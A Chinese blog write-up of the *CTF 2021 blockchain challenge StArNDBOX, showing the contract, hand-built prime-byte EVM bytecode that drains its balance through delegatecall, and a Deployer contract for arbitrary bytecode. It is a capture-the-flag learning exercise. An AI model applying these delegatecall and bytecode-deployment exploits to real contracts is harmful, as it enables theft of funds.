*ctf 2021 StArNDBOX

最新推荐文章于 2022-08-06 16:02:50 发布
最新推荐文章于 2022-08-06 16:02:50 发布
阅读量465 收藏
点赞数 1
分类专栏: 区块链 文章标签: 区块链
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rfrder/article/details/115901197
版权

前言

一道也是要手写opcode的题目,其实目前的理解感觉有些懵懂,但是至少对于题目的基本原理也是懂了,学到了很多。

WP

源码:

pragma solidity ^0.5.11;

library Math {
    function invMod(int256 _x, int256 _pp) internal pure returns (int) {
        int u3 = _x;
        int v3 = _pp;
        int u1 = 1;
        int v1 = 0;
        int q = 0;
        while (v3 > 0){
            q = u3/v3;
            u1= v1;
            v1 = u1 - v1*q;
            u3 = v3;
            v3 = u3 - v3*q;
        }
        while (u1<0){
            u1 += _pp;
        }
        return u1;
    }
    
    function expMod(int base, int pow,int mod) internal pure returns (int res){
        res = 1;
        if(mod > 0){
            base = base % mod;
            for (; pow != 0; pow >>= 1) {
                if (pow & 1 == 1) {
                    res = (base * res) % mod;
                }
                base = (base * base) % mod;
            }
        }
        return res;
    }
    function pow_mod(int base, int pow, int mod) internal pure returns (int res) {
        if (pow >= 0) {
            return expMod(base,pow,mod);
        }
        else {
            int inv = invMod(base,mod);
            return expMod(inv,abs(pow),mod);
        }
    }
    
    function isPrime(int n) internal pure returns (bool) {
        if (n == 2 ||n == 3 || n == 5) {
            return true;
        } else if (n % 2 ==0 && n > 1 ){
            return false;
        } else {
            int d = n - 1;
            int s = 0;
            while (d & 1 != 1 && d != 0) {
                d >>= 1;
                ++s;
            }
            int a=2;
            int xPre;
            int j;
            int x = pow_mod(a, d, n);
            if (x == 1 || x == (n - 1)) {
                return true;
            } else {
                for (j = 0; j < s; ++j) {
                    xPre = x;
                    x = pow_mod(x, 2, n);
                    if (x == n-1){
                        return true;
                    }else if(x == 1){
                        return false;
                    }
                }
            }
            return false;
        }
    }
    
    function gcd(int a, int b) internal pure returns (int) {
        int t = 0;
        if (a < b) {
            t = a;
            a = b;
            b = t;
        }
        while (b != 0) {
            t = b;
            b = a % b;
            a = t;
        }
        return a;
    }
    function abs(int num) internal pure returns (int) {
        if (num >= 0) {
            return num;
        } else {
            return (0 - num);
        }
    }
    
}

contract StArNDBOX{
    using Math for int;
    constructor()public payable{
    }
    modifier StAr() {
        require(msg.sender != tx.origin);
        _;
    }
    function StArNDBoX(address _addr) public payable{
        
        uint256 size;
        bytes memory code;
        int res;
        
        assembly{
            //计算_addr 的   length of the contract bytecode
            size := extcodesize(_addr)
            //code = memory[0x40:0x40+0x20]
            code := mload(0x40)
            /*
            memory[0x40:0x40+0x20] =  code + (((size+0x20)+0x1f) & (~0x1f))
            */
            mstore(0x40, add(code, and(add(add(size, 0x20), 0x1f), not(0x1f))))
            //memory[code:code+0x20] = size;
            mstore(code, size)
            //memory[code+0x20:code+0x20+size] = address(addr).code[0:size];
            extcodecopy(_addr, add(code, 0x20), 0, size)
        }
        for(uint256 i = 0; i < code.length; i++) {
            res = int(uint8(code[i]));
            require(res.isPrime() == true);
        }
        bool success;
        bytes memory _;
        (success, _) = _addr.delegatecall("");
        require(success);
    }
}

题目的合约里有100wei,要求我们把这100wei转走即可。
看一下代码,就会发现要求_addr的bytecode的每一位都是素数(这里是isPrime()函数检验),实际上:0,1和素数都可以。

因此思路其实很清楚就是构造合约的bytecode了,之前刷Ethernaut的时候,里面的MagicNumber也是这样需要自己构造bytecode的了。。
还需要注意最后的:(success, _) = _addr.delegatecall("");
也是很危险的利用点了:
在这里插入图片描述
执行环境是调用者的运行环境,即合约本身的环境。

接下来就是知识盲区了,解法是利用call:
在这里插入图片描述
发起转账,而且call的是F1,正好也是素数。其中100wei是0x64,不是素数,可以利用add或者sub来构造:

61 push2 0x0001
61 push2 0x0001
61 push2 0x0001
61 push2 0x0001
61 push2 0x0001
61 push2 0x0065
03 sub    
61 push2 0x0000
61 push2 0xfbfb
f1 call

等价于这样:

def _fallback() payable: # default function
  call 0x0 with:
     value 100 wei
       gas 64507 wei

得到6100016100016100016100016100016100650361000161fbfbf1

接下来的问题就是,怎么构造一个bytecode是这些的合约了。之前在Ethernaut是直接在控制台上这样构造:

await web3.eth.sendTransaction({from:player,data:"0x600a600c600039600a6000f3602a60805260206080f3"}, function(err,res){console.log(res)})
await contract.setSolver("0x067Cb3Ec131555289AC6C12cF702f121d080e1E1");

因此我也尝试本地去利用node.js的web3.js写构造合约的代码,然后写了一早上,踩了一堆坑还是报错。。。吐了。。。。

看了别的师傅的WP,通过指定 constructor 函数的返回值,即可完成任意字节码的部署:

pragma solidity ^0.5.11;

contract Deployer {
    constructor() public {
        bytes memory bytecode = hex'6100016100016100016100016100016100650361000161fbfbf1';
        assembly {
            return (add(bytecode, 0x20), mload(bytecode))
        }
    }
}

在这里插入图片描述

关于素数的判断,是61转10进制是97,是素数因此可以。这样的每两位来判断的。

得到合约后打过去即可:
在这里插入图片描述
在这里插入图片描述

即可成功

总结

其实还是有些迷的,关于指定 constructor 函数的返回值,即可完成任意字节码的部署这里之后再学一下。

bfengj
关注
专栏目录
[SWPUCTF 2021 新生赛]sql - 联合注入
oZuoShen123的博客
10-07 680
Your Login name:id,flag —— 这里复习了一下任意匹配字符,一开始都以为不用加%,差点忘记了。Your Login name:LTLT_flag,users —— 得到LTLT_flag。1、fuzz看哪些关键字被过滤:空格、substr、=被过滤。这题相比于参考文章的题目多了waf过滤。首先,仍然是网站标题提示参数是wllm。
CTF-RSA经典题目之P=pow(p,2,n)
m0_55017965的博客
05-05 550
CTF-RSA的一类型题目
gwb-crypto-1
zip471642048的博客
12-06 1216
crypto1 拿到题目直接base64 就是普通共模攻击,编写脚本直接秒杀。 import gmpy2 import libnum e1 = 667430104865289 e2 = 537409930523421 c1 = 65902678572727724179176496573968997182712063317082289120453094068199325419989688382177808529042322217887334005084504796397220804856167255176
ctf之RSA
qq_53106085的博客
10-19 1805
选择两个大素数p和q,计算出模数N = p * q 计算φ = (p−1) * (q−1) 即N的欧拉函数,然后选择一个e (1<e<φ),且e和φ互质 取e的模反数为d,计算方法: e * d ≡ 1 (mod φ) 对明文m进行加密:c = pow(m, e, N),得到的c即为密文 对密文c进行解密,m = pow(c, d, N),得到的m即为明文 p 和 q :大整数N的两个因子(factor) N:大整数N,我们称之为模数(modulus e 和 d:互为模反数的两个指
BUUCTF——rsa系列(6)
Luiino的博客
08-06 1381
看到有两部分,第一部分是以e = 256的rsa解密,但因为e与phi_n不互质的原因,用一般的方法解不出来,看了大佬们的wp后,知道了用。说明有4个‘FC’,但是我们不能确定这里所有的‘FC’都是被替换而来的,也有可能原本就有,所以这里共有。接下来就是利用定理来得到一个方程了,参考了大佬的步骤,尝试着推一推吧(嫌敲起来麻烦,在纸上推算了!== 16种情况,需要进行爆破。得到hint,最终的flag长度小于400。来解,可以用于e不是很大且一般的rsa解法行不通的时候。给了n、c、e、以及被替换过的p。..
CTF密码学总结(二)
沐一 · 林 的博客
11-03 3万+
CTF 密码学总结 出人意料的flag: 指在题目中获取到了flag,但是这个flag可能长得不像flag,或者flag还要经过进一步的脑洞处理,而不是常规的解密处理。 非预期行为: 指解题中出现与预想结果不符合的一系列非预期行为,这基本说明了在中间或前面存在其他自己还没分析的操作。 冗余中锁定关键代码: 从后往前看,就是确定比较关键对象,从该对象开始排除其他无关变量,一步步找出与该对象有关的其它变量,最后串起找到的所有相关变量,然后开始逆向分析。 题目类型总结: 题目描述暗
*CTF2021部分题目解题思路及exp
liucc09的博客
01-18 3129
babyheap 这是pwn里面唯一的传统heap题,使用的是新的libc2.27,chunk被free到tcache后bk位置会被写入一个地址,再次free时如果bk有这个地址会和tcache里的所有chunk挨个比较,发现一样的就报double free tcache 2,因此要再free之后把bk置零就行了。 题目第一个坑,在edit方法里面读入数据是从chunk+8的位置的开始写,也就是不让修改fd,这导致虽然有UAF,也无法很方便的实现任意地址写。解决方法为构造重叠的chunk,从而改到tcach
*CTF 2023 Misc
最新发布
07-30
**CTF 2023 Misc** CTF(Capture The Flag)是一种网络安全竞赛,参与者通过解谜、破解、分析和编程来解决各种信息安全问题。"Misc"通常代表混合类别,意味着这个CTF挑战包含了多种不同领域的知识,比如密码学、...
BUUCTF[*CTF2019]otaku解题过程复现(超详细)
weixin_67057449的博客
07-29 760
在学习过程中看了好几个人的解题过程,复现还是复现了好久,自己来写一篇详细一点的。
领航杯 CTF 2021 决赛 真题 7z
12-07
领航杯 CTF 2021 决赛
starctf2021:* CTF2021的官方源代码和内容
03-20
starctf2021 * CTF2021的官方源代码和内容
CTF密码学中RSA学习以及总结
热门推荐
test
10-05 5万+
关于CTF中RSA学习笔记 RSA简介 为了方便理解,先对RSA密钥体制做个简略的介绍。 选择两个大的参数,计算出模数 N = p * q 计算欧拉函数 φ = (p-1) * (q-1),然后选择一个e(1&amp;amp;amp;amp;lt;e&amp;amp;amp;amp;lt;φ),并且e和φ互质(互质:公约数只有1的两个整数) 取e的模反数d,计算方法为:e * d ≡ 1 (mod φ) (模反元素:如果两个正整数e和n互质,那么一定可以...
Solidity学习::(17)fallback函数
dieju8330的博客
10-23 4201
fallback函数 在合约调用没有匹配到函数签名,或者调用没有带任何数据时被自动调用。  声明方式: 没有名字,不能有参数,没有返回值 pragma solidity ^0.4.0; contract SimpleFallback{ function(){ //fallback function } } 简单例子: 由于Solidity编辑器remix中...
[CTF从0到1学习] 二、CTF 密码学
qq_43710889的博客
12-05 9064
密码学 概述 密码学是研究编制密码和破译密码的技术科学 使信息保密的技术和科学学叫密码编码学 破译密文的科学与技术叫密码分析学 信息安全的基本模型 密码学基本概念 明文:没有加密的文字or字符串 密文:对明文加密之后的报文 加密算法: 解密算法 加密密钥 解密密钥 单钥密码体系 双钥密码体系 密码学的历史与发展 第一阶段(1949年前) 古典密码发展阶段 隐写术,暗语,隐语,藏头诗等 采用手工或机械变换的方式实现 单表代换密码:Caesar密码、仿射密
CTF中几种通用的sql盲注手法和注入的一些tips
xuchen16的博客
10-09 2582
转载自:https://www.anquanke.com/post/id/160584 0x00 前言 在ctf比赛中难免会遇到一些比较有(keng)趣(die)的注入题,需要我们一步步的绕过waf和过滤规则,这种情况下大多数的注入方法都是盲注。然而在盲注过程中由于这些过滤规则不太好绕过,这时候就会无从下手,下面分享一下自己在比赛中总结几种比较通用的盲注手法和一些小tips,希望能在今后大家的...
ctf密码学总结
Reset
11-05 1万+
自己做题总结的小知识点。 1.RSA 公钥标准文件的后缀是  .pem 加密过程  选择两个大素数p和q,计算出模数N = p * q  计算φ = (p−1) * (q−1) 即N的欧拉函数,然后选择一个e (1&lt;e&lt;φ),且e和φ互质  取e的模反数为d,计算方法: e * d ≡ 1 (mod φ)  对明文m进行加密:c≡m^e (mod n) 或 c = pow(...
*CTF 2021 PWN babyheap WriteUp
lrcno6的编程世界
01-19 1085
前言 比赛的时候看到这道题就放弃了(哭~~) 主要还是堆学艺不精 (畏难) 赛后认真思考,其实很快就出来了 我们可怜的FPGA: 惨 没办法我们真的太菜了 说实话我觉得赛后能做出来也很给队伍长脸了 *CTF 2021 PWN babyheap WriteUp PWN中的全场最水题(但像我这种菜鸡比赛时都没做出来) 程序分析 全保护 常规堆题的菜单式 一些奇奇怪怪的地方: add功能可以覆盖之前的指针 delete有UAF edit功能居然是从+8偏移开始写的!(这里一开始让我人都傻了)
pow函数
INGNIGHT的专栏
04-18 542
/*分治思想 n= 5 2 1 0 x^5 x^2 x^1 x^0 x^2 * x^2 *x x^1 * x^1 1*1*x 1*/ class Solution { public:
全国大学生信息安全竞赛初赛writeup
蚁景网安学院
08-24 5292
WEBBabyunserialize扫目录发现了www.zip下载下来发现似曾相识图片之前wmctf2020的webweb出了f3的反序列化题直接用exp打图片System被ban了 ...
Securinets CTF 2021:漏洞利用解析与技巧
"Securinets CTF Quals 2021的比赛解题报告,主要涉及一个名为'kill shot'的Pwn类题目,该题目是一个受到Seccomp保护的二进制程序,需要利用格式字符串漏洞泄露libc和栈地址,通过Write What Where技术将fastbin链接...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值